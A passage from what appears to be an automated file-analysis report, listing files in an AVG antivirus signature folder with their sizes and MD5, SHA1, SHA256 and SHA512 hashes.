                                                                                      903060751908713fcd31b93efc76142db9d4e2f7

                                                                                      SHA256

                                                                                      fed034cd385b4343eaf9592a6f37f44d83d4557607e8b31ab18e280536a7a8f8

                                                                                      SHA512

                                                                                      4beeb21629c4d3d9be22f6cd97c3dec4d781e5305f9667fcb3cacdfb633b8271a0fc914c5fca2ab7251a9fc6b3b54cfe811edd30d95a3047a3d521c228716c5b

                                                                                    • C:\Program Files\AVG\AvVps\db_dyna.sig

                                                                                      Filesize

                                                                                      22KB

                                                                                      MD5

                                                                                      1067418bcda16b71d75219c803f08ebc

                                                                                      SHA1

                                                                                      806c045bdafcddf1f5add9ab7884224d02422533

                                                                                      SHA256

                                                                                      6b20599fef01749c4e16ca00b874d048492b2546ff7675ee44dd10bf5d238610

                                                                                      SHA512

                                                                                      e449f51824de6aa5e39dbca501bcd75be28c9f03b8c54a7ef555efa051a0d3caa7e3fcf094477b410896483c7ff9a6a1bedd305ecd7d7fe7edcbe6be5ce0ab56

                                                                                    • C:\Program Files\AVG\AvVps\db_el.dat

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      af0b80fb8a97bd02b5af0fdc838bd05f

                                                                                      SHA1

                                                                                      c2587ede6f3fe3ffb62f7d2944e5ca8b900088dd

                                                                                      SHA256

                                                                                      232867c4cffd5d252960f7b8a87c084fde65ea9edbb377231202f8f060a6a53f

                                                                                      SHA512

                                                                                      3b7f32567b36240a271bb4d99815c9416c94bd9b1549e5f96dff8bc00546ba054f102f00cd6ba0fef23820afde46bdf68de11771dfab27e1b0262f748e064de4

                                                                                    • C:\Program Files\AVG\AvVps\db_elf.nmp

                                                                                      Filesize

                                                                                      9KB

                                                                                      MD5

                                                                                      d0e2749fbd513242e0bcf5fb96f0e898

                                                                                      SHA1

                                                                                      2c80425c5c16dc4de1f8c493e0425191d2329b87

                                                                                      SHA256

                                                                                      30495a3ad5874a5534327e45b4f0173732699933a054fa383163181de9e1868e

                                                                                      SHA512

                                                                                      cc5163fdc46318ca739d9502cee78f2fde53884e25b321b1348a61d34a8f01dc62a5941f379af3c6a5a5b20410826e6777f02ede6734fe970561934b031d3ada

                                                                                    • C:\Program Files\AVG\AvVps\db_elf.sig

                                                                                      Filesize

                                                                                      169KB

                                                                                      MD5

                                                                                      b636441de2bd310aec09b197d1256ce7

                                                                                      SHA1

                                                                                      8176560a884b7bab787cdc2d3c65150811ec775b

                                                                                      SHA256

                                                                                      d7de1bd2d8ead6de252a542b9e151f1830d408c0e9c24063e46741a9f1124d82

                                                                                      SHA512

                                                                                      a45fb7cdf1102aaef8b84c33ced65db6892b01c8d28c317a6291236a939cbd8a8bb530a428c5a903b58176db81c7bc080df4b50833800f0ead010a09174517a6

                                                                                    • C:\Program Files\AVG\AvVps\db_elfa.nmp

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      5ea7fe10355c8d42ae4795a38a6f33fe

                                                                                      SHA1

                                                                                      17d4cf9c0ee43c3a12f8f4e52ef0d85f640d8f88

                                                                                      SHA256

                                                                                      85c1b8806a91ef997063590adf87c3951263ad15308e6b0e8b1a5ae7ffa34c61

                                                                                      SHA512

                                                                                      a5cc2bac5b86594fd3222849b91150625512f5f4ab20dc4670e0ea3826420ad2e564ea1540f60ed070bc9812dd0cbccfa1e5674c2c1db064d8cb6d63f10d1d86

                                                                                    • C:\Program Files\AVG\AvVps\db_elfa.sig

                                                                                      Filesize

                                                                                      73KB

                                                                                      MD5

                                                                                      607c9d47bf65ac9237960715a03e5777

                                                                                      SHA1

                                                                                      c1a17fcee627659f3997f788f908c87dd7cee600

                                                                                      SHA256

                                                                                      a1febe65452ae13696ee3d9b54b79b566fce24322e0bfe893d823208db377fd2

                                                                                      SHA512

                                                                                      cf00aac99a2b0794bee39e58ee1bc8c4eb25ca6e8612b386a6dbf0b78e4fe7a7b1145f0890fd1c9c478c08a2e5495c8d5ff3f75b7442cd4d0cf896006f90677c

                                                                                    • C:\Program Files\AVG\AvVps\db_evope.dat

                                                                                      Filesize

                                                                                      4.1MB

                                                                                      MD5

                                                                                      1474e114664cd77515734ab17cc5e081

                                                                                      SHA1

                                                                                      78103ac427979358552fefb945c64eddfe5e8794

                                                                                      SHA256

                                                                                      36de74b20b65f0d942c4cc4e692114b9882a674353f1e3850e69aba71ccf404f

                                                                                      SHA512

                                                                                      a04c34da842ed793c03b46452424cddcc5e8076f0795392cd7e118bf0fa624f63fa0ebe4a7f444171f386ab5df66b018b4beab96fc0adc6f29fedc669f098ad2

                                                                                    • C:\Program Files\AVG\AvVps\db_ext.dat

                                                                                      Filesize

                                                                                      361B

                                                                                      MD5

                                                                                      d9e702b0770fcde0e8972ef908f407c1

                                                                                      SHA1

                                                                                      1dd133a49bdbc660555e6b1817e7f32b86cea207

                                                                                      SHA256

                                                                                      80462d9f317d92d6a30859cc7dec5eee5f0831ae3314a6028ad75363e64dfeb0

                                                                                      SHA512

                                                                                      eb1beaba3e6acf231e24ed339b505ec9fcfd5391f5e79b2328f612212b01e281dd17538f74e9b2601dc157da57f07c963fac5549e6c23c92571d42f182ea886e

                                                                                    • C:\Program Files\AVG\AvVps\db_fn.nmp

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      12ed44551b22ccdc263b301b75a11694

                                                                                      SHA1

                                                                                      918d727623087ad6efc4a409a73ace3f3256ede0

                                                                                      SHA256

                                                                                      8c52f689936b680ee6615a49c749853572c81a46f4e81609b0a97409011de6b2

                                                                                      SHA512

                                                                                      237090e126fd0f0044e7194380576780e6e6cda73387feba4ad5a78cdae579b8d01a0aa077b44d80ce9c5040a45d6a856eb6709ff22d82f07284c61a536b57c4

                                                                                    • C:\Program Files\AVG\AvVps\db_fn.sig

                                                                                      Filesize

                                                                                      53KB

                                                                                      MD5

                                                                                      9a5547eaeffe277568e5d6aa88403ed1

                                                                                      SHA1

                                                                                      833d26d52511e69c70706d803428e9e9be8fd486

                                                                                      SHA256

                                                                                      977019f49f1370e0eb179ad945e795bfbc3cdfe78eb2b315db8b54b275cf0fcd

                                                                                      SHA512

                                                                                      c6baa5c4a0ac79c1748134eb060644073f1b6d32efdef8b1a57b8f2ece2855f9fe7ba98d4f8c1fc7587c63348d1a4565a2ad788d3090c288c7dc47d8a2208846

                                                                                    • C:\Program Files\AVG\AvVps\db_java.nmp

                                                                                      Filesize

                                                                                      7KB

                                                                                      MD5

                                                                                      e1f34f3f6a318ef38382dee0d30f3a09

                                                                                      SHA1

                                                                                      fe3ebfa6a4115127a3a1bdd47b7f31e64b078cdb

                                                                                      SHA256

                                                                                      998feda083a9ec6b8883dc55b2aca6da9f4f1cbb40d377c5f8ffec13d2e3837f

                                                                                      SHA512

                                                                                      b2a085f59f681b4803d5c24a985415cd11144803b6c2c7433a2d373eb6245805a58d49c29da6d391f6b169de645b793a92fcab7cc5393576e1ebe54fd04ca673

                                                                                    • C:\Program Files\AVG\AvVps\db_java.sig

                                                                                      Filesize

                                                                                      264KB

                                                                                      MD5

                                                                                      13d7b5968bab43c6a5e58b842c1f4fab

                                                                                      SHA1

                                                                                      8c9d8d6e87d171d1fb052fca24bb2f808e593c06

                                                                                      SHA256

                                                                                      345e84d61a6a6f1bed551c41f1c3661c2637fa2fc14994b1b77822b92c1b167a

                                                                                      SHA512

                                                                                      b7a50f4f138abacb5cd98211e8cde966b1e05f11fb91776becea26de392bea0f2c28af0c1264bf8bccf094c7947d3c0dfa170310dcd5b1e8a03bb285f77ebb16

                                                                                    • C:\Program Files\AVG\AvVps\db_js.nmp

                                                                                      Filesize

                                                                                      77KB

                                                                                      MD5

                                                                                      63b958486af8146df39ac37058985001

                                                                                      SHA1

                                                                                      86a2d658fe7f3fb5d585734c5a22e6f36231e83b

                                                                                      SHA256

                                                                                      145961f5ebfcbceeb94242a5f419aadf0d24a6f551e3d0447a7001ba58115791

                                                                                      SHA512

                                                                                      63a0c53ce0e7d3302bb6d934ecbdfb4c389f28c196e6209ed325a648ab8bdc9a8608844c732a04b5519f5433046ea01c6e88175cb72af0a57143fec1e1f76a15

                                                                                    • C:\Program Files\AVG\AvVps\db_js.sig

                                                                                      Filesize

                                                                                      3.4MB

                                                                                      MD5

                                                                                      c210ef0c60871713fbb4cdedb01f03aa

                                                                                      SHA1

                                                                                      e20bb9d73b1ec9a978f6343e74b7c2d8591e34cf

                                                                                      SHA256

                                                                                      c5a6ad6993ef095cb4a43c56d43b66c6a9d5d50bbdd081398a59f28f984d7c3f

                                                                                      SHA512

                                                                                      a547ae617d9a83613131fa06bbf1b2972094ae9640b72ff8cd79a8f1191edd7bf4f0ad0c7a4dad17fee8de8eb02710b0cbee32061796b8c4788f460e097ea286

                                                                                    • C:\Program Files\AVG\AvVps\db_mx4.nmp

                                                                                      Filesize

                                                                                      112B

                                                                                      MD5

                                                                                      26e1241030964c1558f9f78fedbdb33c

                                                                                      SHA1

                                                                                      2d8f9082390631f4c1e7766debb9ddc38bb984a9

                                                                                      SHA256

                                                                                      854eea92844aca8babee6f13cb4fb447696dcfaa4295411becfa7c102edaf19a

                                                                                      SHA512

                                                                                      10cb2cb0c4c2a305cd7bed85ec94176c571b797954332444066487c266ec8a7a1f022cfead037fd183f411790f88b1fb709baacd8ac0233ed7d3520187796297

                                                                                    • C:\Program Files\AVG\AvVps\db_mx4.sig

                                                                                      Filesize

                                                                                      9KB

                                                                                      MD5

                                                                                      4938d8ceb3b870b904fd668ab2ef15cd

                                                                                      SHA1

                                                                                      a676febab37854733245674db465daa83cdc1745

                                                                                      SHA256

                                                                                      1bc7ced4ab406c746cd9a48ee432c9957ca3b7a96cb7224ff057ac3a543b40ca

                                                                                      SHA512

                                                                                      9f19bfae0c6e96585bdaa768b65e20a5faa455de7d754019936e0030e58dff619df7b90afe04f52132d56964dd6504cc1dac7a60cd54f58f0653d5ca1b742b0c

                                                                                    • C:\Program Files\AVG\AvVps\db_mx95.nmp

                                                                                      Filesize

                                                                                      398B

                                                                                      MD5

                                                                                      3bf599b6d050cf1e910969ef1555a696

                                                                                      SHA1

                                                                                      7a622c6444c1251999f39f05fd5b7e8e7376a3b1

                                                                                      SHA256

                                                                                      f8e222621f801f116ab95887196dff02bc996e7e5c3d45443db1b89e321e1b38

                                                                                      SHA512

                                                                                      2ba8583a31752ceb8bc526bc3db274bb0052146500414337eaf61716d52df1790abefd7b18ce05a597ceb2545c82bea74a61d9eb2657b9f16dec47e202643b74

                                                                                    • C:\Program Files\AVG\AvVps\db_mx95.sig

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      36093538c42ba57bc005f6f6da9cb38c

                                                                                      SHA1

                                                                                      64485ae49e25a2ced855830720923cf35750aba2

                                                                                      SHA256

                                                                                      db8f09bde159f8cb51607cc82dfdc27620ae3cd3fdc2119175e89e7ce09012cc

                                                                                      SHA512

                                                                                      583ff891619e1ae5459c1a7752faf52e4e774e383b03c51a9eba8337616d2ac557d27943764c77812f2d3fde55387524d68d7b81b2c8a8f9a2b7079077038238

                                                                                    • C:\Program Files\AVG\AvVps\db_o7.nmp

                                                                                      Filesize

                                                                                      7KB

                                                                                      MD5

                                                                                      24745f9ca1d11ae81770faab57724666

                                                                                      SHA1

                                                                                      445e24e25edf0e95d0c477adf8b19f2b9c7d60a3

                                                                                      SHA256

                                                                                      46757a6edee2119cf03485017132ee9417addabf01a272e4a09f1260fa5cb406

                                                                                      SHA512

                                                                                      caf29978c62524b10f1696d31d1ea8912910edcb53ba7164cf4ffed42d2ca60911eb97bd84b23a2ad0e5f249220a452f561f2bf45d56c4d132ebd0a89c5646b1

                                                                                    • C:\Program Files\AVG\AvVps\db_o7.sig

                                                                                      Filesize

                                                                                      123KB

                                                                                      MD5

                                                                                      cbb068c351ca90a648fc567c5a9b977d

                                                                                      SHA1

                                                                                      923e84108f29cab481d1967ff51143616e9b5e0f

                                                                                      SHA256

                                                                                      c90e4902b60cfcd2c47ec019bfe61eafc04141132260043f28a2fbaf1bce8a07

                                                                                      SHA512

                                                                                      c8361dfe4004455dbbbc3c480f67b71d3f19f9d06e10da3204825a64c077aba5e9e7f8eb060176cd6cb662f21d104ead9d66bafcaa23b594443be3fa5c0643db

                                                                                    • C:\Program Files\AVG\AvVps\db_o7c.dat

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      cb4a7a9c9143d12d76f5367ab3c612d8

                                                                                      SHA1

                                                                                      02997965cb84d64a8146bd6e47bd79026157a826

                                                                                      SHA256

                                                                                      de92f02c0a0e4dc70196682fcb2e922a43d46958049fa4540ab1b681b2d4784f

                                                                                      SHA512

                                                                                      fdae5e9718580a6245561d9a09f72dfa63cb833cc77963e53aa7492d4d746a1f3acf40e2d263ff1417802116766330f9fad8a2992b9b376fb5374301f6e0759c

                                                                                    • C:\Program Files\AVG\AvVps\db_o7c.map

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      534fe68a98dd9a38b72506bbda9a9daf

                                                                                      SHA1

                                                                                      8b33da97ba8a55c28745536ec46cc3fa22876c96

                                                                                      SHA256

                                                                                      847756a48e1371ae2a6008772ec5e7993db907c2cef716740e67c71aebd89bf2

                                                                                      SHA512

                                                                                      8495e8c23b463d84513b25d472e31cf8b0be902d9a4f24bea11e4f39f8745d6b6a7f5d26b5e211dfaf9570ca9f16174217a6ef4365c846b1650b0fda0ccdf6b0

                                                                                    • C:\Program Files\AVG\AvVps\db_ob2.dat

                                                                                      Filesize

                                                                                      22.5MB

                                                                                      MD5

                                                                                      4930f90401b397021c844685907aacca

                                                                                      SHA1

                                                                                      9ba28867155269635072919f52f20a7be9900218

                                                                                      SHA256

                                                                                      aa17cf7f83b6873bfcc5f102c97c247bf98f31a2f324626178ac3bf227fbdac3

                                                                                      SHA512

                                                                                      82500a0e08895fe5a47dad733ecc5d9453f858a1827eaee217f23af45877e2c2f854f72795746657cd2064a2e8a75320f12e16ec6495092ca088bc47c7fade06

                                                                                    • C:\Program Files\AVG\AvVps\db_pay.dat

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      13cc2cc12b2752bf14d49188a1195da6

                                                                                      SHA1

                                                                                      8adca3a81e9a7748881d73f0d35a93f93fa0775f

                                                                                      SHA256

                                                                                      e24430528a9707173f08c5a2a4b327b7d790fca2fa44b7be58d8e3fb31d9d8f6

                                                                                      SHA512

                                                                                      baebfeef682a0f8cee62b5d3fd1af0c0aa64b9a93f07db8e2364cdd39efa424d5c49baaac66def8d137bc4c74c8b8cba0986b16466d75471ef9db6f2a9f76066

                                                                                    • C:\Program Files\AVG\AvVps\db_pe.nmp

                                                                                      Filesize

                                                                                      255KB

                                                                                      MD5

                                                                                      66903ceea2ed8f3776a1078f6eae1081

                                                                                      SHA1

                                                                                      6995d362cbae20b62cbe756d3834b41a525417b9

                                                                                      SHA256

                                                                                      8a9840f3321b0f49dae9573fd89f14adf919572d880c599026e7e79d502b79e6

                                                                                      SHA512

                                                                                      039ea6d6a9d8051a45a10d2bb8a411d4944f67796582c1b93a7b9a1ff23adb00e94a5d9280ca6683570cb8298c7ad5ea5d7f5f2db49c84ec3f19ffe73f2e37bc

                                                                                    • C:\Program Files\AVG\AvVps\db_pe.sig

                                                                                      Filesize

                                                                                      7.0MB

                                                                                      MD5

                                                                                      8e8a607dfb6310df9ff9bce446604afb

                                                                                      SHA1

                                                                                      d56b12fdfd50f2977bdbc5276a840d0965db4e0f

                                                                                      SHA256

                                                                                      08e2ae6d93caaa920486ab88c2d77f3587d800dd675a4fa9d3fde69832b4de70

                                                                                      SHA512

                                                                                      6c8933b3f55d025e67d155a25d4342cc07d7fa3fa4722d5a19ec3895669106444cf46c61f51d1f5800bea4a6fdece73ab762930a9f7079defeb100da31dc400d

                                                                                    • C:\Program Files\AVG\AvVps\db_pe3.dat

                                                                                      Filesize

                                                                                      29.3MB

                                                                                      MD5

                                                                                      bbc31866beb2654d49f95838f93df7a3

                                                                                      SHA1

                                                                                      ae90cec9c611acb8ed0dbe31a30e33784904dad8

                                                                                      SHA256

                                                                                      13175c9d18e2ce23acfdd7f94dc5b67b5d6c2efcd8551c8444675a6b58895898

                                                                                      SHA512

                                                                                      bb0d1233120de3b941e9aab0cad016684f29e25c2c58473566e8d934a03fc4214ad69223423fa7380258493dbc5d3e52cf4336e9f28475247b559d2026702782

                                                                                    • C:\Program Files\AVG\AvVps\db_pph.dat

                                                                                      Filesize

                                                                                      22.3MB

                                                                                      MD5

                                                                                      71424d1daf191cc1591ff6654c4766f2

                                                                                      SHA1

                                                                                      b9260fea54ed4ad97944220c016acf2e2b532876

                                                                                      SHA256

                                                                                      9970fc28466cca6ae7addf44fbe88635904ef30b76bbf2bd4f16a5a6ee9378ed

                                                                                      SHA512

                                                                                      9b3976fb19732fb661ba23954d1229edaf5964483ce6a3344d4dac7cdb2486eb84810d7673208832fb1f3e69d9a4fc01246b9ff41de7925f4c2f4fb9564064d9

                                                                                    • C:\Program Files\AVG\AvVps\db_qcr.dat

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      MD5

                                                                                      d3d61156aa25a967b01827d5d478c7d8

                                                                                      SHA1

                                                                                      1e35afc1fc55c587d2b6a0dd0b1fa5a3d21e476a

                                                                                      SHA256

                                                                                      2086e21de1cdf7a16bdada153364053ad5efbe4ec5688fddb9111ad2dc7c2876

                                                                                      SHA512

                                                                                      b9651703d1ad7b7b065f430835e5196d864b9c464b3544dc01583d45550298447277d95bedb661c45a03dfe3b67360629f53b0ccbf9b1f92b578f67dc8e2440a

                                                                                    • C:\Program Files\AVG\AvVps\db_sl.nmp

                                                                                      Filesize

                                                                                      59B

                                                                                      MD5

                                                                                      6eafc6b178ba81a9b4794176cd2445b3

                                                                                      SHA1

                                                                                      dd5fcdcd18df2d7652dabf500545578fde57f829

                                                                                      SHA256

                                                                                      c3b8286715f98d76d611069d806d881afbf72e5ba139c6f3807080a9fc885389

                                                                                      SHA512

                                                                                      ebe7338c733d2307c7a4b542249eba4588bf47439c3d012794d1700b4e5f805292514126a044b96733904175add8777763bbe254d7590f927e2ab333cb9a7663

                                                                                    • C:\Program Files\AVG\AvVps\db_sl.sig

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      0440c929905e7ed9b0296fd111fe4090

                                                                                      SHA1

                                                                                      0a46484083e0cbb84ea742d947b42daea0c74e78

                                                                                      SHA256

                                                                                      9875523ebb89e054fc40dad7335a6896e1ece74151755cbaa85052e77453fe9b

                                                                                      SHA512

                                                                                      bf4cb5c1e072148cbb86aa12a03d86879c5bd538b4f53a19765a5247022eeb24ac6b161222a52a802c7f86126907067414ce63055397ba7e662418970a85f467

                                                                                    • C:\Program Files\AVG\AvVps\db_snh.dat

                                                                                      Filesize

                                                                                      2.5MB

                                                                                      MD5

                                                                                      508139dc18975f0583ec50ff4e1ccc0c

                                                                                      SHA1

                                                                                      2d3a7ad8cb5f812b3f515697a71d0f92bd2ea24a

                                                                                      SHA256

                                                                                      ddc6c1519bdb0a8708966573eb1a07a2183e3f64a75df5db977acb828013a2af

                                                                                      SHA512

                                                                                      5faa7d6307e44202e8973ffbe49c858f3595712b5c56746b8686361e8416a47343a90a9e3e5adb3ff895160ec90fdb0d46f62aa16a3492861f2825e3b972ea79

                                                                                    • C:\Program Files\AVG\AvVps\db_sp.dat

                                                                                      Filesize

                                                                                      204KB

                                                                                      MD5

                                                                                      5b1161c3cf1d5bae86a3613028d5ff47

                                                                                      SHA1

                                                                                      45b6736b30b48fa795eef0b29cb4e66b296e2dbe

                                                                                      SHA256

                                                                                      d6ee99539602db5680cdb0efc5eb1422d9481445bec9cf83b43b4c022b175262

                                                                                      SHA512

                                                                                      17702ef4bacdb61a58550a53a81c1b47a853c402dfa92f5147cf9e837cd179d47be36cd3f968a8bb0d3142a7598ceddd83bc75c504e23833c4bd4940bc88685c

                                                                                    • C:\Program Files\AVG\AvVps\db_str.nmp

                                                                                      Filesize

                                                                                      58KB

                                                                                      MD5

                                                                                      85a45b20d577d48acd5a41d862588313

                                                                                      SHA1

                                                                                      76a8e49b74593aff01efe8a10b260a02c07d1721

                                                                                      SHA256

                                                                                      92d0157c1ff42ec9f7e4e5862dc6be873ad4b511d577c44c620b8102d896f839

                                                                                      SHA512

                                                                                      2f15fd2f6a920a82ec56eefad25b916c5a461a7fb8fb6ff003500f8337c08c8cdf07c6aad18d7bb75d7c1f963fd212a065524fc85639234074059e234b279377

                                                                                    • C:\Program Files\AVG\AvVps\db_str.sig

                                                                                      Filesize

                                                                                      855KB

                                                                                      MD5

                                                                                      1b1b024ee62a6fbccea4b8800453e5c7

                                                                                      SHA1

                                                                                      c682f3a7faeb0ede2d2e5dae40a571b8fa598563

                                                                                      SHA256

                                                                                      78fb14d2f97724facbf372383976b3a06b9811d69f82fbd7efa1d9bb37dd6c21

                                                                                      SHA512

                                                                                      88e152fa17b7a6e1a1dca07583558ce3bcf21ae3fed8fd2e1de92bbc348661611e01e180bc4ad48b2dea7b20df4d636158bce9297c897547b749e6765b077b00

                                                                                    • C:\Program Files\AVG\AvVps\db_swf.nmp

                                                                                      Filesize

                                                                                      796B

                                                                                      MD5

                                                                                      22a1b180d90eee03b9798a9a4cf80dc3

                                                                                      SHA1

                                                                                      d5114aa3b57a16e9b6b2bbe227d00e4ebbd7adda

                                                                                      SHA256

                                                                                      edea576594d381ef078a041280c31c9c8c6151770f40dcdb3d212ee9824c51bd

                                                                                      SHA512

                                                                                      8eb630a0d0c07a4363e03db018c937237899dfe21814100f4fac33892c240554c850fef25593f35fb9cd38e20169f4adbc51c07903bdf6edab74122f89bf6b6d

                                                                                    • C:\Program Files\AVG\AvVps\db_swf.sig

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      36beba73da4bdd870d6240e3425da718

                                                                                      SHA1

                                                                                      a64711e1381045d3e55f67f50334833a71c67aa2

                                                                                      SHA256

                                                                                      c2d58d280091018fc15a6ff1cba14a4d6589cb993db023814f4e95e51e86da60

                                                                                      SHA512

                                                                                      9e2fabff910e6fdf1095453c90a8e61c0073be4fda8015b30df1a5128944329ad4f0b1daa3a0d7e4d38824eea1d0dd36abdfb70550d73090009bda34b1562750

                                                                                    • C:\Program Files\AVG\AvVps\db_symtrnl.dat

                                                                                      Filesize

                                                                                      90KB

                                                                                      MD5

                                                                                      9e8d3d87825897f301fe7f31651374d4

                                                                                      SHA1

                                                                                      53a40c4bf1fdfd4a74e4f0ffe648e92153780c49

                                                                                      SHA256

                                                                                      85f9a442c054695f46d566b783bc97947cef4a4f9525aa438299910d51d36581

                                                                                      SHA512

                                                                                      f0cd3d2c909d2a09d8f17d92a8c7516e13b1d0c40baf45c37cf9fa9d319c3ac12d6a34de9dc0587eccf987cc05932eb80b922cacaedcbd9f8c9100c4fc4ed57e

                                                                                    • C:\Program Files\AVG\AvVps\db_tx.dat

                                                                                      Filesize

                                                                                      1.4MB

                                                                                      MD5

                                                                                      fa6865528ff10c589c59fb010112d499

                                                                                      SHA1

                                                                                      1fe24c10b240421001eb7e01dfb7a5cbb668ea9d

                                                                                      SHA256

                                                                                      c776d337941ee7bd7ee4ab7bce88123560f0990ba96029acdad9075afc8df50b

                                                                                      SHA512

                                                                                      359c95fa7058d8903aae37368b932286d9d67f19763af9e72aeec2ec5dcf8f58b26efcd41eac6670507e608330db2034b45dca7cff362b992c56d488c97f5c38

                                                                                    • C:\Program Files\AVG\AvVps\db_u.dat

                                                                                      Filesize

                                                                                      61.3MB

                                                                                      MD5

                                                                                      d51eb2f8fe2b18fb3d5636ea4fb4e430

                                                                                      SHA1

                                                                                      a16628f2cea18964bdd847b92142ecaa0ed6c529

                                                                                      SHA256

                                                                                      0b530ddbde944c399061c76c9c3f14929dfcc69c1cec1570b5afffe076f91246

                                                                                      SHA512

                                                                                      d02d4d71358ed10d0c72f72b4ce5635ccb936c2b4143f50b527d2a2651473ffcac3bc6e0f3a30f4dddee986e0d8a27edb5aceb7c6a2f9f8cbcc2546c254cddb9

                                                                                    • C:\Program Files\AVG\AvVps\db_w6.nmp

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      9c4645ee12ce3b338d9677a83d919487

                                                                                      SHA1

                                                                                      fca63d74d2738418230305195b51b3d56b3309b5

                                                                                      SHA256

                                                                                      99b81be7b29652285c366374988a01d6d99c5848001a897df15947d6e74cf32d

                                                                                      SHA512

                                                                                      ef6b7c3969f92ea04de1286491d61446659f8867a001f90294873b8a0513c1136cf126e1d79c6b64a3ce29041475883d3a26dbce912df58b756d9e6ce7d4bd18

                                                                                    • C:\Program Files\AVG\AvVps\db_w6.sig

                                                                                      Filesize

                                                                                      19KB

                                                                                      MD5

                                                                                      c3eaad0cc1d9a82a460e6a90ff0c76c6

                                                                                      SHA1

                                                                                      be33dbeaff35c23901ea3d0f0491ca53e6f670d6

                                                                                      SHA256

                                                                                      38d6c1dce4b206445240384225dc63ac434da814ce57b798e81fd43821f03921

                                                                                      SHA512

                                                                                      b99c3df3c25b9ed6da568a2a3cd184482c2fed5f1a2c6686f65bbb87fe3bc29cd8f40719bd91cf1f6210e86669f9f0e32ba2229811adb332af2b464d6fec5d1a

                                                                                    • C:\Program Files\AVG\AvVps\db_w6c.dat

                                                                                      Filesize

                                                                                      56KB

                                                                                      MD5

                                                                                      525f4fe527ca7c09d4ee3cf687547757

                                                                                      SHA1

                                                                                      8332ab48a2ef07033b97d2178442d8c6ccf6649d

                                                                                      SHA256

                                                                                      aad3b0a87587ea79ceb4cfda51ac5c93c565357f1c62b21b653ad5ce916244d3

                                                                                      SHA512

                                                                                      6763281d8aa1a985e767d4d7b8c22ce361ceec646022bfe33c66452548cc519aec23e9afab61c12f5c3e6bc7ff191554f226f3b8e94edc2458b8190056a38fed

                                                                                    • C:\Program Files\AVG\AvVps\db_w6c.map

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      fede58c5e447d2fa7d39b9340d72ef0d

                                                                                      SHA1

                                                                                      4f258d23692d795e2a78d73ff299063a0abfc33a

                                                                                      SHA256

                                                                                      cf52174b647373762150cd11a50eb0ebf1383caf6f641e3f79cbc713959d2a2d

                                                                                      SHA512

                                                                                      d51a55e7475d2d78cc7f79915729e05075b4c24484f60ce89149d1a5a4c598fb260a766b9b5e255d414d8adc3f3d19da1cbbb89a18601ca313f1cefd226d10cd

                                                                                    • C:\Program Files\AVG\AvVps\db_wat.nmp

                                                                                      Filesize

                                                                                      83B

                                                                                      MD5

                                                                                      4a6580a61062b3b262ac49ff93d0a4f6

                                                                                      SHA1

                                                                                      ac693579414cfec883e69cd656795af099321e3b

                                                                                      SHA256

                                                                                      a83d050a35a20b10addf01155121e067e247e1954b31025cf8763091b137bc0b

                                                                                      SHA512

                                                                                      ce5bcfa2e422d80e1ba03c8307fb17245c527244b5cf2c17760038b6b2b78fe23dce046f1ec68b14ba10553397a641fd3c8f8dad0792d41c47627bc56f9370d8

                                                                                    • C:\Program Files\AVG\AvVps\db_wat.sig

                                                                                      Filesize

                                                                                      8KB

                                                                                      MD5

                                                                                      14de05ca7eae5b02aef5bfb861defd38

                                                                                      SHA1

                                                                                      f2044b8383de20f3c7b465af71619f2c38024c23

                                                                                      SHA256

                                                                                      74020eb6a1a6c3d97049967d808ade63018f7d1cfcc5b7164f30931de1a4e2dd

                                                                                      SHA512

                                                                                      819902b559d54ccbe9f8ad0ee682b166275a7220d3cc22c3a50c38f5f02a944b9748c2f9e988f5153740d9ae0af471a9e015dd103f1ea03a52da73a614e04ef5

                                                                                    • C:\Program Files\AVG\AvVps\db_wh2.dat

                                                                                      Filesize

                                                                                      8.8MB

                                                                                      MD5

                                                                                      22bd18127b35b9123b59176697240b5b

                                                                                      SHA1

                                                                                      e8c8d894a324501125c6d0e36dc74fbdfabc4463

                                                                                      SHA256

                                                                                      bfa3f06761402685f533e8daaa0638db94f30344c775e072cfdb8dae4f154708

                                                                                      SHA512

                                                                                      db5e4fcdc36f05cb9dc365dbd16ecdfbdbeaf23bb896430b5ce610e3eb3eaa10b72a2930dda3e15409b13aa79bf8e7e1f7d44c991420de85debc636f728ffece

                                                                                    • C:\Program Files\AVG\AvVps\db_xtn.map

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      c6b902a91a0f7990a59a5e0a02079b37

                                                                                      SHA1

                                                                                      1d28aadac0b9aa10d1e40e5a5dc18b439fb61e8e

                                                                                      SHA256

                                                                                      3d703aed5dede16026cc370a019ee442cc11f68be3e73766aff4bcd1c1101c86

                                                                                      SHA512

                                                                                      eccf36cc23a1b106d2bf46dd45b2f64599157251621a1dfa1391f086cdbb445282f63017aa1b36ebbb551e5d6a1fd373d7e643ccf685035ecc75ca7a95b08571

                                                                                    • C:\Program Files\AVG\AvVps\def.ini

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      277b9dc4eed055a6289d3c0faf36209f

                                                                                      SHA1

                                                                                      b5d770998c73b9e8d4b8f180b59b8372ff70b8a3

                                                                                      SHA256

                                                                                      7d572126a0ddf7ee9239a7f1748ada9e5a8ad4e7fe02935e44c0402d74dd6d4f

                                                                                      SHA512

                                                                                      e668b42cde856a75d615c0e7eb1cdf4a7358156a404e860638a8612ddb4309809551b4a553199359cf5de046a00f28b4edff36e3d9c0ca5f2f46afcb166ec17e

                                                                                    • C:\Program Files\AVG\AvVps\engsup.exe

                                                                                      Filesize

                                                                                      2.0MB

                                                                                      MD5

                                                                                      229a5df1b6ede3ab8a9ff63af86c3a14

                                                                                      SHA1

                                                                                      32064746ef9f1a7422f550c7142fd538a66a5d12

                                                                                      SHA256

                                                                                      984b1b4c1448ac8cb984c67e94d78b1a77800291a64d565277d580d58cc666ec

                                                                                      SHA512

